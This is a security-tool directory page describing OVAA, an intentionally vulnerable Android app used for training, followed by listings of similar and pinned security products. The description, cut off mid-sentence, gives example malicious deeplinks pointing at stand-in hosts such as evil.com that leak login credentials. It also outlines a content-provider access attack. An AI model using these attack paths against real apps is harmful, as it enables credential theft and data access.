OVAA (Oversecured Vulnerable Android App)
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities: - Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider. - Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(
FEATURES
EXPLORE BY TAGS
SIMILAR TOOLS
A comprehensive checklist for securing Android apps
Python package for processing and analyzing Zeek data with Pandas, scikit-learn, Kafka, and Spark, with offloading capabilities and improved data analysis features.
GridPot is a cybersecurity tool that integrates GridLAB-D, Conpot, and libiec61850 to simulate and detect attacks on industrial control systems (ICS).
A platform that provides visibility and security monitoring of hardware, firmware, and software components in IT infrastructure to identify supply chain risks and vulnerabilities.
Web-based tool for browsing mobile applications sandbox and previewing SQLite databases.
A PowerShell script that assesses security configurations of Siemens SIMATIC PCS 7 industrial control systems by collecting and analyzing data from various Windows and PCS7-specific sources.
AVEVA is an industrial software provider offering engineering, operations, and data management solutions for operational technology environments across various industrial sectors.
An open-source project for dynamic analysis of Android applications using the Android Substrate framework.
A free and open platform for detecting and preventing email attacks like BEC, malware, and credential phishing, utilizing Message Query Language (MQL) for behavior description.
PINNED
Mandos
Fractional CISO service that helps B2B companies implement security leadership to win enterprise deals, achieve compliance, and develop strategic security programs.
Checkmarx SCA
A software composition analysis tool that identifies vulnerabilities, malicious code, and license risks in open source dependencies throughout the software development lifecycle.
Orca Security
A cloud-native application protection platform that provides agentless security monitoring, vulnerability management, and compliance capabilities across multi-cloud environments.
DryRun
A GitHub application that performs automated security code reviews by analyzing contextual security aspects of code changes during pull requests.